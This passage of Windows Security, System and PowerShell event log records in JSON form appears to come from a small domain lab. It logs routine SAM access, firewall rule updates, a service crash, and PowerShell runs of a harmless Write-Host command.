ID:\t{00000000-0000-0000-0000-000000000000}\r\n\tAccesses:\tDELETE\r\n\t\t\t\tREAD_CONTROL\r\n\t\t\t\tWRITE_DAC\r\n\t\t\t\tWRITE_OWNER\r\n\t\t\t\tReadGeneralInformation\r\n\t\t\t\tReadPreferences\r\n\t\t\t\tWritePreferences\r\n\t\t\t\tReadLogon\r\n\t\t\t\tReadAccount\r\n\t\t\t\tWriteAccount\r\n\t\t\t\tChangePassword (with knowledge of old password)\r\n\t\t\t\tSetPassword (without knowledge of old password)\r\n\t\t\t\t\r\n\tAccess Reasons:\t\t-\r\n\tAccess Mask:\t0xF00FF\r\n\tPrivileges Used for Access Check:\t-\r\n\tProperties:\t---\r\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}\r\nDELETE\r\nREAD_CONTROL\r\nWRITE_DAC\r\nWRITE_OWNER\r\nReadGeneralInformation\r\nReadPreferences\r\nWritePreferences\r\nReadLogon\r\nReadAccount\r\nWriteAccount\r\nChangePassword (with knowledge of old password)\r\nSetPassword (without knowledge of old 
password)\r\n\t\t{ab721a53-1e2f-11d0-9819-00aa0040529b}\r\nDELETE\r\nREAD_CONTROL\r\nWRITE_DAC\r\nWRITE_OWNER\r\nReadGeneralInformation\r\nReadPreferences\r\nWritePreferences\r\nReadLogon\r\nReadAccount\r\nWriteAccount\r\nChangePassword (with knowledge of old password)\r\nSetPassword (without knowledge of old password)\r\nListGroups\r\n\t\t\t{bf967938-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{5fd42471-1262-11d0-a060-00aa006c33ed}\r\n\t\t\t{bf9679e8-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a00-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{3e0abfd0-126a-11d0-a060-00aa006c33ed}\r\n\t\t\t{bf967a6a-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967953-0de6-11d0-a285-00aa003049e2}\r\n\t\t{4c164200-20c0-11d0-a768-00aa006e0529}\r\n\t\t\t{bf967915-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a0a-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a68-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a6d-0de6-11d0-a285-00aa003049e2}\r\n\t\t{5f202010-79a5-11d0-9020-00c04fc2d4cf}\r\n\t\t{59ba2f42-79a2-11d0-9020-00c04fc2d3cf}\r\n\t\t\t{bf967985-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967986-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967996-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967997-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679aa-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679ab-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679ac-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a05-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679a8-0de6-11d0-a285-00aa003049e2}\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{bf967950-0de6-11d0-a285-00aa003049e2}\r\n\t\t{bc0ac240-79a9-11d0-9020-00c04fc2d4cf}\r\n\t\t\t{bf967991-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf96792e-0de6-11d0-a285-00aa003049e2}\r\n\t\t{00299570-246d-11d0-a768-00aa006e0529}\r\n\t\t{7ed84960-ad10-11d0-8a92-00aa006e0529}\r\n\r\n\tRestricted SID Count:\t0","Category":"SAM","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security Account 
Manager","ObjectType":"SAM_USER","ObjectName":"S-1-5-21-2569713578-3403938347-3732993993-501","HandleId":"0x6742c1380","TransactionId":"{00000000-0000-0000-0000-000000000000}","AccessList":"%%1537\r\n\t\t\t\t%%1538\r\n\t\t\t\t%%1539\r\n\t\t\t\t%%1540\r\n\t\t\t\t%%5440\r\n\t\t\t\t%%5441\r\n\t\t\t\t%%5442\r\n\t\t\t\t%%5443\r\n\t\t\t\t%%5444\r\n\t\t\t\t%%5445\r\n\t\t\t\t%%5446\r\n\t\t\t\t%%5447\r\n\t\t\t\t","AccessReason":"-","AccessMask":"0xf00ff","PrivilegeList":"-","Properties":"---\r\n\t{bf967aba-0de6-11d0-a285-00aa003049e2}\r\n%%1537\r\n%%1538\r\n%%1539\r\n%%1540\r\n%%5440\r\n%%5441\r\n%%5442\r\n%%5443\r\n%%5444\r\n%%5445\r\n%%5446\r\n%%5447\r\n\t\t{ab721a53-1e2f-11d0-9819-00aa0040529b}\r\n%%1537\r\n%%1538\r\n%%1539\r\n%%1540\r\n%%5440\r\n%%5441\r\n%%5442\r\n%%5443\r\n%%5444\r\n%%5445\r\n%%5446\r\n%%5447\r\n%%5448\r\n\t\t\t{bf967938-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{5fd42471-1262-11d0-a060-00aa006c33ed}\r\n\t\t\t{bf9679e8-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a00-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{3e0abfd0-126a-11d0-a060-00aa006c33ed}\r\n\t\t\t{bf967a6a-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967953-0de6-11d0-a285-00aa003049e2}\r\n\t\t{4c164200-20c0-11d0-a768-00aa006e0529}\r\n\t\t\t{bf967915-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a0a-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a68-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a6d-0de6-11d0-a285-00aa003049e2}\r\n\t\t{5f202010-79a5-11d0-9020-00c04fc2d4cf}\r\n\t\t{59ba2f42-79a2-11d0-9020-00c04fc2d3cf}\r\n\t\t\t{bf967985-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967986-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967996-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967997-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679aa-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679ab-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679ac-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf967a05-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf9679a8-0de6-11d0-a285-00aa003049e2}\r\n\t\t{e48d0154-bcf8-11d1-8702-00c04fb96050}\r\n\t\t\t{bf967950-0de6-11d0
-a285-00aa003049e2}\r\n\t\t{bc0ac240-79a9-11d0-9020-00c04fc2d4cf}\r\n\t\t\t{bf967991-0de6-11d0-a285-00aa003049e2}\r\n\t\t\t{bf96792e-0de6-11d0-a285-00aa003049e2}\r\n\t\t{00299570-246d-11d0-a768-00aa006e0529}\r\n\t\t{7ed84960-ad10-11d0-8a92-00aa006e0529}\r\n","RestrictedSidCount":"0","ProcessId":"0x200","ProcessName":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2021-10-02T05:28:30.212370+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T05:28:30.134199+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4658,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":190890675,"ExecutionProcessID":4,"ExecutionThreadID":2908,"Channel":"Security","Message":"The handle to an object was closed.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity Account Manager\r\n\tHandle ID:\t\t0x674201760\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x200\r\n\tProcess Name:\t\tC:\\Windows\\System32\\lsass.exe","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security Account Manager","HandleId":"0x674201760","ProcessId":"0x200","ProcessName":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2021-10-02T05:28:30.212370+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T13:09:32.222426+05:45","Hostname":"IT01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4947,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13571,"OpcodeValue":0,"RecordNumber":4064686,"ActivityID":"{1861A8E2-AEB2-0000-61A9-6118B2AED701}","ExecutionProcessID":640,"ExecutionThreadID":4564,"Channel":"Security","Message":"A change was made to the Windows Firewall exception list. A rule was modified.\r\n\t\r\nProfile Changed:\tAll\r\n\r\nModified Rule:\r\n\tRule ID:\t{9067517D-6E0E-4ACA-81A5-93FC55254F9F}\r\n\tRule Name:\t7993f5e6-503d-4945-b625-d1cc888ae184","Category":"MPSSVC Rule-Level Policy Change","Opcode":"Info","ProfileChanged":"All","RuleId":"{9067517D-6E0E-4ACA-81A5-93FC55254F9F}","RuleName":"7993f5e6-503d-4945-b625-d1cc888ae184","EventReceivedTime":"2021-10-01T13:09:33.881737+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T13:09:32.222339+05:45","Hostname":"IT01.corp.local","Keywords":"9223374235878031360","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":2005,"SourceName":"Microsoft-Windows-Windows Firewall With Advanced Security","ProviderGuid":"{D1BC9AFF-2ABF-4D71-9146-ECB2A986EB85}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":11656,"ExecutionProcessID":1552,"ExecutionThreadID":6336,"Channel":"Microsoft-Windows-Windows Firewall With Advanced Security/Firewall","Domain":"NT AUTHORITY","AccountName":"LOCAL SERVICE","UserID":"S-1-5-19","AccountType":"Well Known Group","Message":"A rule has been modified in the Windows Defender Firewall exception list.\r\n\r\nModified Rule:\r\n\tRule ID:\t{9067517D-6E0E-4ACA-81A5-93FC55254F9F}\r\n\tRule Name:\t7993f5e6-503d-4945-b625-d1cc888ae184\r\n\tOrigin:\tLocal\r\n\tActive:\tYes\r\n\tDirection:\tInbound\r\n\tProfiles:\tPrivate,Domain, Public\r\n\tAction:\tAllow\r\n\tApplication Path:\tC:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\r\n\tService Name:\t\r\n\tProtocol:\tUDP\r\n\tSecurity Options:\tNone\r\n\tEdge Traversal:\tNone\r\n\tModifying User:\tS-1-5-18\r\n\tModifying Application:\tC:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\Install\\{3A6BC05A-246C-4B78-8526-A0FAA476A761}\\EDGEMITMP_38766.tmp\\setup.exe","Opcode":"Info","RuleId":"{9067517D-6E0E-4ACA-81A5-93FC55254F9F}","RuleName":"7993f5e6-503d-4945-b625-d1cc888ae184","Origin":"1","ApplicationPath":"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe","Direction":"1","Protocol":"17","LocalPorts":"5353","RemotePorts":"*","Action":"3","Profiles":"2147483647","LocalAddresses":"*","RemoteAddresses":"*","EmbeddedContext":"Microsoft Edge","Flags":"1","Active":"1","EdgeTraversal":"0","LooseSourceMapped":"0","SecurityOptions":"0","ModifyingUser":"S-1-5-18","ModifyingApplication":"C:\\Program Files 
(x86)\\Microsoft\\EdgeUpdate\\Install\\{3A6BC05A-246C-4B78-8526-A0FAA476A761}\\EDGEMITMP_38766.tmp\\setup.exe","SchemaVersion":"542","RuleStatus":"65536","LocalOnlyMapped":"0","EventReceivedTime":"2021-10-01T13:09:33.881737+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T13:13:56.248860+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9227875636482146304","EventType":"AUDIT_FAILURE","SeverityValue":4,"Severity":"ERROR","EventID":6281,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12290,"OpcodeValue":0,"RecordNumber":894537,"ExecutionProcessID":4,"ExecutionThreadID":4424,"Channel":"Security","Message":"Code Integrity determined that the page hashes of an image file are not valid. The file could be improperly signed without page hashes or corrupt due to unauthorized modification. The invalid hashes could indicate a potential disk device error.\r\n\r\nFile Name:\t\\Device\\HarddiskVolume2\\Windows\\System32\\aepic.dll\t","Category":"System Integrity","Opcode":"Info","param1":"\\Device\\HarddiskVolume2\\Windows\\System32\\aepic.dll","EventReceivedTime":"2021-10-01T13:13:57.944403+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T13:13:58.116270+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"9259400833873739776","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":7031,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":56617,"ExecutionProcessID":632,"ExecutionThreadID":4292,"Channel":"System","Message":"The Windows Security Service service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 60000 milliseconds: Restart the service.","param1":"Windows Security Service","param2":"1","param3":"60000","param4":"1","param5":"Restart the service","EventData.Binary":"530065006300750072006900740079004800650061006C007400680053006500720076006900630065000000","EventReceivedTime":"2021-10-01T13:13:58.950999+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T04:55:58.144837+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4798,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13824,"OpcodeValue":0,"RecordNumber":18994779,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":3656,"Channel":"Security","Message":"A user's local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nUser:\r\n\tSecurity ID:\t\tS-1-5-21-4172363987-4097446635-2680456566-501\r\n\tAccount Name:\t\tGuest\r\n\tAccount Domain:\t\tIT02\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x4d4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\CompatTelRunner.exe","Category":"User Account Management","Opcode":"Info","TargetUserName":"Guest","TargetDomainName":"IT02","TargetSid":"S-1-5-21-4172363987-4097446635-2680456566-501","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","CallerProcessId":"0x4d4","CallerProcessName":"C:\\Windows\\System32\\CompatTelRunner.exe","EventReceivedTime":"2021-10-02T04:55:59.663632+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T03:02:20.605380+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4690,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12807,"OpcodeValue":0,"RecordNumber":190887410,"ExecutionProcessID":4,"ExecutionThreadID":4296,"Channel":"Security","Message":"An attempt was made to duplicate a handle to an object.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nSource Handle Information:\r\n\tSource Handle ID:\t0x26c\r\n\tSource Process ID:\t0x13d4\r\n\r\nNew Handle Information:\r\n\tTarget Handle ID:\t0xd64\r\n\tTarget Process ID:\t0x4","Category":"Handle Manipulation","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","SourceHandleId":"0x26c","SourceProcessId":"0x13d4","TargetHandleId":"0xd64","TargetProcessId":"0x4","EventReceivedTime":"2021-10-02T03:02:21.433504+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T03:02:20.605380+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4656,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":1,"TaskValue":12800,"OpcodeValue":0,"RecordNumber":190887416,"ExecutionProcessID":512,"ExecutionThreadID":520,"Channel":"Security","Message":"A handle to an object was requested.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nObject:\r\n\tObject Server:\t\tSecurity\r\n\tObject Type:\t\tFile\r\n\tObject Name:\t\tC:\\Windows\\WinSxS\\FileMaps\\$$_system32_21f9a9c4a2f8b514.cdf-ms\r\n\tHandle ID:\t\t0x26c\r\n\tResource Attributes:\t-\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x13d4\r\n\tProcess Name:\t\tC:\\Windows\\System32\\rundll32.exe\r\n\r\nAccess Request Information:\r\n\tTransaction ID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\tAccesses:\t\tREAD_CONTROL\r\n\t\t\t\tSYNCHRONIZE\r\n\t\t\t\tReadData (or ListDirectory)\r\n\t\t\t\tReadEA\r\n\t\t\t\tReadAttributes\r\n\t\t\t\t\r\n\tAccess Reasons:\t\tREAD_CONTROL:\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\tSYNCHRONIZE:\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\tReadData (or ListDirectory):\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\tReadEA:\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\tReadAttributes:\tGranted by\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x120089\r\n\tPrivileges Used for Access Check:\t-\r\n\tRestricted SID Count:\t0","Category":"File 
System","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","ObjectServer":"Security","ObjectType":"File","ObjectName":"C:\\Windows\\WinSxS\\FileMaps\\$$_system32_21f9a9c4a2f8b514.cdf-ms","HandleId":"0x26c","TransactionId":"{00000000-0000-0000-0000-000000000000}","AccessList":"%%1538\r\n\t\t\t\t%%1541\r\n\t\t\t\t%%4416\r\n\t\t\t\t%%4419\r\n\t\t\t\t%%4423\r\n\t\t\t\t","AccessReason":"%%1538:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t%%1541:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t%%4416:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t%%4419:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t%%4423:\t%%1801\tD:(A;;0x1200a9;;;BA)\r\n\t\t\t\t","AccessMask":"0x120089","PrivilegeList":"-","RestrictedSidCount":"0","ProcessId":"0x13d4","ProcessName":"C:\\Windows\\System32\\rundll32.exe","ResourceAttributes":"-","EventReceivedTime":"2021-10-02T03:02:21.433504+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T04:57:43.602355+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":500,"SourceName":"PowerShell","Version":0,"TaskValue":5,"OpcodeValue":0,"RecordNumber":2057584,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Command \"\" is Started. \r\n\r\nDetails: \r\n\tNewCommandState=Started\r\n\r\n\tSequenceNumber=26\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.19041.868\r\n\tHostId=9e1a634c-bd69-49c0-9571-caa27b7ce918\r\n\tHostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\r\n\tEngineVersion=5.1.19041.868\r\n\tRunspaceId=24619fd4-75be-406b-b906-7daf65757881\r\n\tPipelineId=3\r\n\tCommandName=\r\n\tCommandType=Script\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Command Lifecycle","Opcode":"Info","Data":"Started","Data_1":"\tNewCommandState=Started\n\n\tSequenceNumber=26\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.868\n\tHostId=9e1a634c-bd69-49c0-9571-caa27b7ce918\n\tHostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\n\tEngineVersion=5.1.19041.868\n\tRunspaceId=24619fd4-75be-406b-b906-7daf65757881\n\tPipelineId=3\n\tCommandName=\n\tCommandType=Script\n\tScriptName=\n\tCommandPath=\n\tCommandLine=","EventReceivedTime":"2021-10-02T04:57:44.645032+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T04:57:43.394149+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":501,"SourceName":"PowerShell","Version":0,"TaskValue":5,"OpcodeValue":0,"RecordNumber":2057581,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Windows PowerShell","Message":"Command \"\" is Stopped. \r\n\r\nDetails: \r\n\tNewCommandState=Stopped\r\n\r\n\tSequenceNumber=22\r\n\r\n\tHostName=ConsoleHost\r\n\tHostVersion=5.1.19041.868\r\n\tHostId=9e1a634c-bd69-49c0-9571-caa27b7ce918\r\n\tHostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\r\n\tEngineVersion=5.1.19041.868\r\n\tRunspaceId=24619fd4-75be-406b-b906-7daf65757881\r\n\tPipelineId=1\r\n\tCommandName=\r\n\tCommandType=Script\r\n\tScriptName=\r\n\tCommandPath=\r\n\tCommandLine=","Category":"Command Lifecycle","Opcode":"Info","Data":"Stopped","Data_1":"\tNewCommandState=Stopped\n\n\tSequenceNumber=22\n\n\tHostName=ConsoleHost\n\tHostVersion=5.1.19041.868\n\tHostId=9e1a634c-bd69-49c0-9571-caa27b7ce918\n\tHostApplication=powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\n\tEngineVersion=5.1.19041.868\n\tRunspaceId=24619fd4-75be-406b-b906-7daf65757881\n\tPipelineId=1\n\tCommandName=\n\tCommandType=Script\n\tScriptName=\n\tCommandPath=\n\tCommandLine=","EventReceivedTime":"2021-10-02T04:57:43.577923+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T04:36:33.738635+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"0","EventType":"WARNING","SeverityValue":3,"Severity":"WARNING","EventID":4100,"SourceName":"Microsoft-Windows-PowerShell","ProviderGuid":"{A0C1853B-5C40-4B15-8766-3CF1C58F985A}","Version":1,"TaskValue":106,"OpcodeValue":19,"RecordNumber":7998,"ActivityID":"{63A5CF36-AEB8-0001-511F-A863B8AED701}","ExecutionProcessID":6328,"ExecutionThreadID":2744,"Channel":"Microsoft-Windows-PowerShell/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Error Message = File C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.\r\nFully Qualified Error ID = UnauthorizedAccess\r\nRecommended Action = \r\n\r\n\r\nContext:\r\n Severity = Warning\r\n Host Name = ConsoleHost\r\n Host Version = 5.1.19041.610\r\n Host ID = 8fbaf51c-c06d-4ae9-9a70-9a299b2e3793\r\n Host Application = powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\r\n Engine Version = 5.1.19041.610\r\n Runspace ID = 61e18963-08f1-411b-83f7-04f09c65205a\r\n Pipeline ID = 1\r\n Command Name = \r\n Command Type = \r\n Script Name = \r\n Command Path = \r\n Sequence Number = 15\r\n User = PROD\\SYSTEM\r\n Connected User = \r\n Shell ID = Microsoft.PowerShell\r\n\r\n\r\nUser Data:\r\n\r\n","Category":"Executing Pipeline","Opcode":"To be used when an exception is raised","ContextInfo":" Severity = Warning\n Host Name = ConsoleHost\n Host Version = 5.1.19041.610\n Host ID = 8fbaf51c-c06d-4ae9-9a70-9a299b2e3793\n Host Application = powershell.exe -ExecutionPolicy Restricted -Command Write-Host 'Final result: 1';\n Engine Version = 5.1.19041.610\n Runspace ID = 61e18963-08f1-411b-83f7-04f09c65205a\n Pipeline ID = 1\n Command Name = \n Command Type = \n Script Name = \n 
Command Path = \n Sequence Number = 15\n User = PROD\\SYSTEM\n Connected User = \n Shell ID = Microsoft.PowerShell\n","Payload":"Error Message = File C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at https:/go.microsoft.com/fwlink/?LinkID=135170.\nFully Qualified Error ID = UnauthorizedAccess\nRecommended Action = \n","EventReceivedTime":"2021-10-02T04:36:34.726415+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T04:21:34.656739+05:45","Hostname":"IT01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":5823,"SourceName":"NETLOGON","TaskValue":0,"RecordNumber":26133,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"System","Message":" The system successfully changed its password on the domain controller \\\\DC01.corp.local. This event is logged when the password for the computer account is changed by the system. It is logged on the computer that changed the password.","Opcode":"Info","Data":"\\\\DC01.corp.local","EventReceivedTime":"2021-10-01T04:21:35.170126+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-01T04:21:34.463665+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4742,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13825,"OpcodeValue":0,"RecordNumber":190867006,"ExecutionProcessID":512,"ExecutionThreadID":4268,"Channel":"Security","Message":"A computer account was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E6\r\n\r\nComputer Account That Was Changed:\r\n\tSecurity ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1131\r\n\tAccount Name:\t\tIT01$\r\n\tAccount Domain:\t\tCORP\r\n\r\nChanged Attributes:\r\n\tSAM Account Name:\t-\r\n\tDisplay Name:\t\t-\r\n\tUser Principal Name:\t-\r\n\tHome Directory:\t\t-\r\n\tHome Drive:\t\t-\r\n\tScript Path:\t\t-\r\n\tProfile Path:\t\t-\r\n\tUser Workstations:\t-\r\n\tPassword Last Set:\t10/1/2021 4:21:34 AM\r\n\tAccount Expires:\t\t-\r\n\tPrimary Group ID:\t-\r\n\tAllowedToDelegateTo:\t-\r\n\tOld UAC Value:\t\t-\r\n\tNew UAC Value:\t\t-\r\n\tUser Account Control:\t-\r\n\tUser Parameters:\t-\r\n\tSID History:\t\t-\r\n\tLogon Hours:\t\t-\r\n\tDNS Host Name:\t\t-\r\n\tService Principal Names:\t-\r\n\r\nAdditional Information:\r\n\tPrivileges:\t\t-","Category":"Computer Account Management","Opcode":"Info","ComputerAccountChange":"-","TargetUserName":"IT01$","TargetDomainName":"CORP","TargetSid":"S-1-5-21-2569713578-3403938347-3732993993-1131","SubjectUserSid":"S-1-5-7","SubjectUserName":"ANONYMOUS LOGON","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e6","PrivilegeList":"-","SamAccountName":"-","DisplayName":"-","UserPrincipalName":"-","HomeDirectory":"-","HomePath":"-","ScriptPath":"-","ProfilePath":"-","UserWorkstations":"-","PasswordLastSet":"10/1/2021 4:21:34 
AM","AccountExpires":"-","PrimaryGroupId":"-","AllowedToDelegateTo":"-","OldUacValue":"-","NewUacValue":"-","UserAccountControl":"-","UserParameters":"-","SidHistory":"-","LogonHours":"-","DnsHostName":"-","ServicePrincipalNames":"-","EventReceivedTime":"2021-10-01T04:21:35.698025+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
